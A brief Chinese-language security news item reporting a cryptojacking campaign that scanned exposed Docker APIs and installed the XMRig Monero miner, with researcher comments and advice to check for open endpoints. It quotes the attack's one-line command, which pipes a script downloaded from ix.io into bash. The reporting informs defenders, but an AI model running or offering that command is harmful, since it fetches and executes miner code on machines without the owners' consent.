站長之家(ChinaZ.com) 11月28日 消息:據(jù)tnw報道，一黑客組織正對企業(yè)沙箱軟件Docker進行大規(guī)模掃描，以搜索系統(tǒng)上易受攻擊的端口，以挖掘加密貨幣。

根據(jù)Bad Packets的安全研究人員的說法，從上周末開始的掃描發(fā)現(xiàn)了一些漏洞，這些漏洞允許攻擊者在公司的Docker實例植入加密貨幣挖礦惡意代碼。

就目前情況來看，攻擊者在加密劫持活動已經(jīng)掃描了超過 59000 個IP網(wǎng)絡(luò)，尋找易受攻擊的Docker實例。研究人員在一個暴露的Docker實例中發(fā)現(xiàn)運行下面一行代碼：

chroot/mnt/bin/sh-c ' curl-SL4 http：//ix.io/1XQa | bash

該惡意代碼將從攻擊者的服務器下載另一個腳本，然后安裝一個加密挖礦工具，Monero miner XMRig。

Bad Packets首席研究官兼聯(lián)合創(chuàng)始人Troy Mursch稱，在這幾天針對Docker的攻擊活動中，黑客挖掘了14.82 XMR，價值約 740 美元。Mursch建議運行Docker平臺的用戶立即檢查他們是否在互聯(lián)網(wǎng)上公開了其API端點。

注：Docker 是一個開源的應用容器引擎，讓開發(fā)者可以打包他們的應用以及依賴包到一個可移植的鏡像中，然后發(fā)布到任何流行的 Linux或Windows 機器上，也可以實現(xiàn)虛擬化。容器是完全使用沙箱機制，相互之間不會有任何接口。

（舉報）